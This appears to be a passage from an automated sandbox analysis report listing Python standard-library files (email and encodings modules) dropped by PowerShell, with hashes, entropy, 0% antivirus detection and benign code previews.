                                                                                                                                                                                                              Preview:"""Policy framework for the email package.....Allows fine grained feature control of how the package parses and emits data..."""....import abc..from email import header..from email import charset as _charset..from email.utils import _has_surrogates....__all__ = [.. 'Policy',.. 'Compat32',.. 'compat32',.. ]......class _PolicyBase:.... """Policy Object basic framework..... This class is useless unless subclassed. A subclass should define.. class attributes with defaults for any values that are to be.. managed by the Policy object. The constructor will then allow.. non-default values to be set for these attributes at instance.. creation time. The instance will be callable, taking these same.. attributes keyword arguments, and returning a new instance.. identical to the called instance except for those values changed.. by the keyword arguments. Instances may be added, yielding new.. instances with any non-default values from the right hand..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1434
                                                                                                                                                                                                              Entropy (8bit):4.644260380765894
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:QUXt+wqvdN2BiUEcUd6A0I+96FuW6MZ7jP56rbQb71WBMq3EVsYpBNGpAnU7:fXvaExxPTU6MZHB63QbgxEVxpbGpWg
                                                                                                                                                                                                              MD5:57646EF79925F3A767E8D96C92F3D2DD
                                                                                                                                                                                                              SHA1:E9984ECD5186B8CAFA0DFA87D4F25A19CB7C5CB7
                                                                                                                                                                                                              SHA-256:2B26287EC2834C6EF83DA1B27515E07844A8E7DBE95909F87C1C5659B13BD681
                                                                                                                                                                                                              SHA-512:F569F44709AE9BD88A5BF3D6F4F650832135C799E51078D094EECB966DE5546AA682728FC7BAD46186F56FA25735C47EBA46EE45355FFE7F07EF4613CC9E2ED5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Class representing text/* type MIME documents."""....__all__ = ['MIMEText']....from email.mime.nonmultipart import MIMENonMultipart......class MIMEText(MIMENonMultipart):.. """Class for generating text/* type MIME documents.""".... def __init__(self, _text, _subtype='plain', _charset=None, *, policy=None):.. """Create a text/* type MIME document..... _text is the string for this message object..... _subtype is the MIME sub content type, defaulting to "plain"..... _charset is the character set parameter added to the Content-Type.. header. This defaults to "us-ascii". Note that as a side-effect, the.. Content-Transfer-Encoding header will also be set... """.... # If no _charset was specified, check to see if there are non-ascii.. # characters present. If not, use 'us-ascii', otherwise use utf-8...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5102
                                                                                                                                                                                                              Entropy (8bit):4.472055499586524
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2XyKLTo1bb9AHs5ofboK7bG7RGTN4xBw3XKaFFGaCps2/fboKhyuRGTjg6DBw3Ev:2Xzo1bb9AwOUOGRrTOoPrXUluRQg+0+
                                                                                                                                                                                                              MD5:C61722D80FF9CDFD5E09A35D29FA3366
                                                                                                                                                                                                              SHA1:FF45B22C343E0B8D0E27F2F4345033897C04D08E
                                                                                                                                                                                                              SHA-256:AFBA51FC27B46872A69836B24F803089153EC68632DFFA0C9F8146999E44222D
                                                                                                                                                                                                              SHA-512:EDF8E3BDCEBF6A015671C8CA5C88CF146E9EE906F8F20F11B993B453976462CD247BD901F27AF7D537BA4E0CF43AC85B98083342B6CCCF8485BD9DCAE147A9B1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter..# Contact: email-sig@python.org...."""A parser of RFC 2822 and MIME email messages."""....__all__ = ['Parser', 'HeaderParser', 'BytesParser', 'BytesHeaderParser',.. 'FeedParser', 'BytesFeedParser']....from io import StringIO, TextIOWrapper....from email.feedparser import FeedParser, BytesFeedParser..from email._policybase import compat32......class Parser:.. def __init__(self, _class=None, *, policy=compat32):.. """Parser of RFC 2822 and MIME email messages..... Creates an in-memory object tree representing the email message, which.. can then be manipulated and turned over to a Generator to return the.. textual representation of the message..... The string must be formatted as a block of RFC 2822 headers and header.. continuation lines, optionally preceded by a `Unix-from' header. The.. header block is terminated ei
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10750
                                                                                                                                                                                                              Entropy (8bit):4.330712179126964
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Qv6SMMmTGSigeS0LiEUjoEfgT78kskc5UeKEaYpw9x5bTCBU:Qv6jvTGOvPovT78KeKEbe97TCK
                                                                                                                                                                                                              MD5:2B26CBC5E2744BF27F93FE33A32F6C52
                                                                                                                                                                                                              SHA1:53F9E5797555D9F7D5F28348CD77BD9893432E34
                                                                                                                                                                                                              SHA-256:96BA552A8056500A3FDD35CC0A524C9E4876BF650FBC2AA7864023FD7B4445F3
                                                                                                                                                                                                              SHA-512:342D5483DA2AE3C060AD2108325FFCF5BADFDBB8DB7D213B8029C713FB348253AE8971547DB7C8CE9AF771E3AE16632F49493E2594A74CD1F4F0B869C1AFF83C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:"""This will be the home for the policy that hooks in the new..code that adds all the email6 features..."""....import re..import sys..from email._policybase import Policy, Compat32, compat32, _extend_docstrings..from email.utils import _has_surrogates..from email.headerregistry import HeaderRegistry as HeaderRegistry..from email.contentmanager import raw_data_manager..from email.message import EmailMessage....__all__ = [.. 'Compat32',.. 'compat32',.. 'Policy',.. 'EmailPolicy',.. 'default',.. 'strict',.. 'SMTP',.. 'HTTP',.. ]....linesep_splitter = re.compile(r'\n|\r')....@_extend_docstrings..class EmailPolicy(Policy):.... """+.. PROVISIONAL.... The API extensions enabled by this policy are currently provisional... Refer to the documentation for details..... This policy adds new header parsing and folding algorithms. Instead of.. simple strings, headers are custom objects with custom attributes.. depending on the type of the field. The fo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10164
                                                                                                                                                                                                              Entropy (8bit):4.804983973506496
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:/3mMHQE/phvw+cxdP6AwkAZFAFx6Rr7XsXDTFaUf/B2m/fbweCMBsTmam8k2LHd:/t/phvEHzw9ZFAArgXDTvXC4sTcA
                                                                                                                                                                                                              MD5:FECCF9784ADB77632D53AE618E90E25C
                                                                                                                                                                                                              SHA1:4B016A456160B76009959D97CD176FFA88A921D6
                                                                                                                                                                                                              SHA-256:6C5C673D41D65E1B39779C9DE4907C8B1ED04216B4472593DEF0EAB904E8D237
                                                                                                                                                                                                              SHA-512:0057614B57AA948C1D706827911580EDD350F234A5C3BF315424B00D6570217ABC9655B7A06F1592793B817AAB758C59B0273A125E77F4A7B782AD4CCE93313B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Ben Gertzfield..# Contact: email-sig@python.org...."""Quoted-printable content transfer encoding per RFCs 2045-2047.....This module handles the content transfer encoding method defined in RFC 2045..to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to..safely encode text that is in a character set similar to the 7-bit US ASCII..character set, but that includes some 8-bit characters that are normally not..allowed in email bodies or headers.....Quoted-printable is very space-inefficient for encoding binary files; use the..email.base64mime module for that instead.....This module provides an interface to encode and decode both headers and bodies..with quoted-printable encoding.....RFC 2045 defines a method for including character set information in an..`encoded-word' in a header. This method is commonly used for 8-bit real names..in To:/From:/Cc: etc. fields, as well as Subject: lines.....This module do
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12645
                                                                                                                                                                                                              Entropy (8bit):4.716671950237963
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:+TXDPOM1DSx0rReFY2yHhDYlYZInHfUWm:+TXDPOCq0rz7HhDYF/6
                                                                                                                                                                                                              MD5:5A9FDAAA8E00A8A7E0E9F980F977950F
                                                                                                                                                                                                              SHA1:2B0C0636755DF662CE54738491CDA9DB8420163F
                                                                                                                                                                                                              SHA-256:A53C5FC6A34EA37B733FF105599E6D9A8B58EFC7C10C3180E1F1FD26F288E47D
                                                                                                                                                                                                              SHA-512:5A8B019A3C89937C8D45CB946E4FFDAE4B8B7F3C4ECDE92E9679282250012E620ED0C05D09E0E866B1E905851E15B0DE0F3460667410475B80896C70058E89E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:# Copyright (C) 2001-2010 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Miscellaneous utilities."""....__all__ = [.. 'collapse_rfc2231_value',.. 'decode_params',.. 'decode_rfc2231',.. 'encode_rfc2231',.. 'formataddr',.. 'formatdate',.. 'format_datetime',.. 'getaddresses',.. 'make_msgid',.. 'mktime_tz',.. 'parseaddr',.. 'parsedate',.. 'parsedate_tz',.. 'parsedate_to_datetime',.. 'unquote',.. ]....import os..import re..import time..import random..import socket..import datetime..import urllib.parse....from email._parseaddr import quote..from email._parseaddr import AddressList as _AddressList..from email._parseaddr import mktime_tz....from email._parseaddr import parsedate, parsedate_tz, _parsedate_tz....# Intrapackage imports..from email.charset import Charset....COMMASPACE = ', '..EMPTYSTRING = ''..UEMPTYSTRING = ''..CRLF = '\r\n'..TICK = "'"....specialsre = re.compile(r'[][\\()<>@,:;".]')..escap
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6058
                                                                                                                                                                                                              Entropy (8bit):4.513858440536954
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:VHdpCpI/qD2Q0pU8F6fdaLcbkCN/yRMffWL1+rpOc6i7AYS2kEJl+iKaN6w1AD4:XpCpIPpHEN/yYi1+NOc6IAYS2kEXR6wr
                                                                                                                                                                                                              MD5:EA0E0D20C2C06613FD5A23DF78109CBA
                                                                                                                                                                                                              SHA1:B0CB1BEDACDB494271AC726CAF521AD1C3709257
                                                                                                                                                                                                              SHA-256:8B997E9F7BEEF09DE01C34AC34191866D3AB25E17164E08F411940B070BC3E74
                                                                                                                                                                                                              SHA-512:D8824B315AA1EB44337FF8C3DA274E07F76B827AF2A5AC0E84D108F7A4961D0C5A649F2D7D8725E02CD6A064D6069BE84C838FB92E8951784D6E891EF54737A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Standard "encodings" Package.... Standard Python encoding modules are stored in this package.. directory..... Codec modules must have names corresponding to normalized encoding.. names as defined in the normalize_encoding() function below, e.g... 'utf-8' must be implemented by the module 'utf_8.py'..... Each codec module must export the following interface:.... * getregentry() -> codecs.CodecInfo object.. The getregentry() API must return a CodecInfo object with encoder, decoder,.. incrementalencoder, incrementaldecoder, streamwriter and streamreader.. attributes which adhere to the Python Codec Interface Standard..... In addition, a module may optionally also define the following.. APIs which are then used by the package's codec search function:.... * getaliases() -> sequence of encoding name strings to use as aliases.... Alias names returned by getaliases() must be normalized encoding.. names as defined by normalize_encoding().....Writ
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5837
                                                                                                                                                                                                              Entropy (8bit):5.578903889963503
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:avoHIYGspF3e06Q0Yhh6Yjz/6kVXfOmhfKYnjkwVY5tT6pl02TYbXigaKSDVRoM/:2YLpFkYX6GXVKYnjkwaDeX0Za/pACJh
                                                                                                                                                                                                              MD5:84768F76569FA801EAB47DE481A5215A
                                                                                                                                                                                                              SHA1:3F20F4147D74AEADE2CE21A9C839134937DAAC8D
                                                                                                                                                                                                              SHA-256:97DF04147BD7399198A455A32BA6A79D5C6851428B47404137E4AFCA8D7C6B65
                                                                                                                                                                                                              SHA-512:A34E96EDC6263702E0C455B187AD20B5EAB2F82CC8126A0FB160B75EE76D2CE5F998D4F219BDEF38CE72EFD77A13F89853F1B94F52E6E187B5C0700276C903A0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j...................Z...G.d...d.e.e.........Z.d...Z.d...Z...e.j...................e...........e.j...................d.k(..r.d...Z...e.j...................e...........y.y.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12455
                                                                                                                                                                                                              Entropy (8bit):6.122373219598486
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:TX2eNkBweGfGkueKm+I14Xqb36RhOgaxL8PZm+/Qnu1iKSWk2lEfBN2ckAaq1YaM:TXG0buenU6uHc+6eOfj2fUYxCwZuiBD
                                                                                                                                                                                                              MD5:6A4BE0AFF039F7B92AC9F32B305DC0C8
                                                                                                                                                                                                              SHA1:F1F14175D20E8D2392C366FA8518B91EB2A72D4C
                                                                                                                                                                                                              SHA-256:4961ACA95D84F3825587A0832BCA1CFBB076DEB3783536F8DB73463ABDF48B75
                                                                                                                                                                                                              SHA-512:48942B17F5358E577DB87753309B810C05151A7EB021A698D473607E561FF6A28DCA04E411D46F4BCF25E43A68D5D1E742BCED54B7AD6279F545E410354D0A23
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........ed?..............................d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3181
                                                                                                                                                                                                              Entropy (8bit):5.155165427620733
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:D+kM1qr1Ye1SX82XGbL2JSZpxkTBcArETpmD1l/c4WqDfLTTLTDfLTTp6HbDHbBJ:qko0Y/34Gu7kTiArwcDIjCf33Pf396nf
                                                                                                                                                                                                              MD5:B761AABDA9F721FFA56F623D8C570175
                                                                                                                                                                                                              SHA1:9B7C288D4754CE80B9B8CB7BF14F85E7FE3CAFE9
                                                                                                                                                                                                              SHA-256:E55B77939B3F53AE6DA7B7923A69DBD19ABB3617DE109A85500AB4DD297EA0A7
                                                                                                                                                                                                              SHA-512:5F8FA395EE3BB2106561367054B422F8C3BBA92246D4FB71CF5135774FDE75A9D9435FC9B3584528C82A9CB7CBD00164EF9E5D80FF55BE11FCD613C35CA9628E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e.5..............................d.Z.d.d.l.Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j...........................Z...G.d...d.e.e.j...........................Z.d...Z.d.Z...e.j...................e.........Z.y.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc...........................e.Z.d.Z.d.d...Z.d.d...Z.y.)...Codecc.....................8.....t.........j...................|.|.t.................S...N)...codecs..charmap_encode..encoding_table....self..input..errorss.... .VC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\encodings\cp1252.py..encodez.Codec.encode................$..$.U.6....A..A.....c.....................8.....t.........j...................|.|.t.................S.r....).r......charmap_decode..decoding_tabler....s.... r......decodez.Codec.decode....r....r....N)...s
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13331
                                                                                                                                                                                                              Entropy (8bit):5.609170087287683
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:gamku5TnFk+xNkekcV7UihlYdOEczj+JFnHookioJR1GTnGRtFyz7nRAXE2JHFtC:1gFRCc5ydOBQokEkTnG0HRA0y8T
                                                                                                                                                                                                              MD5:AABC1F1E9715096926686F574B29AA7B
                                                                                                                                                                                                              SHA1:4126037C58ACC7AF146F36422F83D2AD2CEEB71D
                                                                                                                                                                                                              SHA-256:BDB3277AEFDC6B3E7EA91A3B3D3791E756B573C84DB8162663B7F87B1D273312
                                                                                                                                                                                                              SHA-512:B67EC600116E404169B3317691827CB6E10576ACF97E4B7DF748B9F562FF42C9284166CF7A5EE28EC068F832CB64E688A09295F842E1347B58116AED00546296
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e................................d.Z.d.d.l.Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j...........................Z...G.d...d.e.e.j...........................Z.d...Z...e.j.....................e.d.................Z.e.j...................i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..d-d...d/d0..i.d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF..dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR....i.dFdS..dHdT..dUdV..dJdW..dXdY..dZd[..d\d]..d^d_..dYd`..dadb..d`dc..dddQ..deda..dfdg..dhdi..djdk..dldm....i.dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d[d|..dgd}..dcd~..dbd...d.d...d]d...d.d...d.d...d.d...d.d.....i.d,d...d.d...d4d...d.d...d.d...d0d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...dWd...d.d...d.d...d.d.....i.d.d...dBd...d.d...d.d...d.d...d.d...d.d...dDd...d.d...d.d...d.d...d.d...dPd...d.d...d.d...d.d...d.d.....i.d2dr..d.d...d$d..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9963
                                                                                                                                                                                                              Entropy (8bit):5.132925772985094
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:+dW06OECxoHAdT3MI+O+vZ31l8ji88u8nyPb:oW06DglhAh8Sd+
                                                                                                                                                                                                              MD5:A849502326FB603E7E88CD71C0A45DCC
                                                                                                                                                                                                              SHA1:657AE2B0BA35D976304353B8212C3687E4232A90
                                                                                                                                                                                                              SHA-256:20B79B041722ABCED16AC86242DDE85BBF466D72E7D12EF39C8CDEA7A1D77EE9
                                                                                                                                                                                                              SHA-512:C85332F2195D6023D3FEBF97AAAEAACE167AA8A51BA4AF868E8F83F66FC4796AFB092CF51ECD66EE02EF8C24C0971BFE96B33D98519F8E699F81BC503347AB37
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e+'........................B.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....e.j...................d.........Z.d.Z.d.Z.d...Z.d...Z.d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j"..........................Z...G.d...d.e.e.j$..........................Z.d...Z.y.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c.....................F.....g.}.|.D.]<..}.t.........j...................|.........r...|.j...................t.........j...................|....................>..d.j...................|.........}.t.........j...................d.|.........}.|.D.]...}.t.........j...................|.........s.t.........j...................|.........s.t.........j...................|.........s.t.........j...................|.........sjt.........j...................|.........sUt.........j...................|.........s@t.........j...................|.........s+t.........j...................|........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2194
                                                                                                                                                                                                              Entropy (8bit):4.6620133517305
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:pXaXgOHi/6P2XHApxkMEyzxe15tGPYD+Pw6t2Vj:NawOHQhHA7kMlVgiwx
                                                                                                                                                                                                              MD5:C391F284A65B8759F7039C52699AE377
                                                                                                                                                                                                              SHA1:0D78F58E785147E7BA21163A8F43116B14F3724D
                                                                                                                                                                                                              SHA-256:BB210117F5D66D9C714925608001C9929837EDEEDCCE6F5FF060AD61998E2B47
                                                                                                                                                                                                              SHA-512:13F457B9B9FAF68EAC5185F8D8D3435ED2FC65F72249B45DB1F78C476E2D034F893188311669843A4BAED4DF1B28B0398C36941A8296D2C906ECE46073C5A113
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...........e................................d.Z.d.d.l.Z.e.j...................Z.d.d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.d...Z.y.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........Nc.....................0.....t.........j...................|.|.d.........S.).NT)...codecs..utf_8_decode)...input..errorss.... .UC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\encodings\utf_8.py..decoder........s................u.f.d..3..3.....c...........................e.Z.d.Z.d.d...Z.y.)...IncrementalEncoderc.....................H.....t.........j...................|.|.j...........................d.....S.).Nr....).r......utf_8_encoder....)...selfr......finals.... r......encodez.IncrementalEncoder.encode....s..........."..".5.$.+.+..6.q..9..9r....N).F)...__name__..__mo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16228
                                                                                                                                                                                                              Entropy (8bit):4.043924236672622
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ojm3001RTSvqNLtEBLKSyhNM4Bu7fbROCVLD6S+:oMReiNLtEB+Syhi4Bu7zHVLud
                                                                                                                                                                                                              MD5:FF23F6BB45E7B769787B0619B27BC245
                                                                                                                                                                                                              SHA1:60172E8C464711CF890BC8A4FECCFF35AA3DE17A
                                                                                                                                                                                                              SHA-256:1893CFB597BC5EAFD38EF03AC85D8874620112514EB42660408811929CC0D6F8
                                                                                                                                                                                                              SHA-512:EA6B685A859EF2FCD47B8473F43037341049B8BA3EEA01D763E2304A2C2ADDDB01008B58C14B4274D9AF8A07F686CD337DE25AFEB9A252A426D85D3B7D661EF9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Encoding Aliases Support.... This module is used by the encodings package search function to.. map encodings names to module names..... Note that the search function normalizes the encoding names before.. doing the lookup, so the mapping will have to map normalized.. encoding names to module names..... Contents:.... The following aliases dictionary contains mappings of all IANA.. character set names for which the Python core library provides.. codecs. In addition to these, a few Python specific codec.. aliases have also been added....."""..aliases = {.... # Please keep this list sorted alphabetically by value !.... # ascii codec.. '646' : 'ascii',.. 'ansi_x3.4_1968' : 'ascii',.. 'ansi_x3_4_1968' : 'ascii', # some email headers use this non-standard name.. 'ansi_x3.4_1986' : 'ascii',.. 'cp367' : 'ascii',.. 'csascii' : 'ascii',.. 'ibm367' : 'ascii',.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1298
                                                                                                                                                                                                              Entropy (8bit):4.6538766905589
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:JASEHV0yWoyWFmSMufQRhQFmBUQWSJzWSJDtyWFmtyWz9ZKj951QJxlTpf:JASdue6SJ6SJ8TKxQJxHf
                                                                                                                                                                                                              MD5:FF48C6334861799D8D554F5D2A30BA00
                                                                                                                                                                                                              SHA1:08520B19D0353712CDFD919B3694945678C3D2D7
                                                                                                                                                                                                              SHA-256:698C578B9B5DF7BD6F8B2761D114F74CFF854C1396083C8AB912B11FCAE83B86
                                                                                                                                                                                                              SHA-512:087A0E1BA9D9CA2C2F51F0156AD0ADA1D1EB7CCBA8B46159B95779B053D2431FC52BA1CA57FEC381EA044A7F0E41490B5389B1AF2DBF513C35CC1B29997FEE6E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python 'ascii' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.ascii_encode.. decode = codecs.ascii_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.ascii_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.ascii_decode(input, self.errors)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....class StreamConverter(StreamWriter,StreamReader):.... encode = codecs.ascii_decode.. decode = codecs.ascii_encode....### encodings module API....def getreg
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1588
                                                                                                                                                                                                              Entropy (8bit):4.646022236658084
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XDpo1AIxDc1AIxj1i1uuMP9vIvPTKqPJxHjH:XVo/xDc/xjoMu2A3TK0rH
                                                                                                                                                                                                              MD5:46F8E67E43DAC28160F47E3870B39365
                                                                                                                                                                                                              SHA1:0B1A69175889E5D4603C616EBD6E7EC456C6ABCB
                                                                                                                                                                                                              SHA-256:AC4443CEB3E045F064335AED4C9C2143F1C256DDD25AAA5A9DB4B5EE1BCCF694
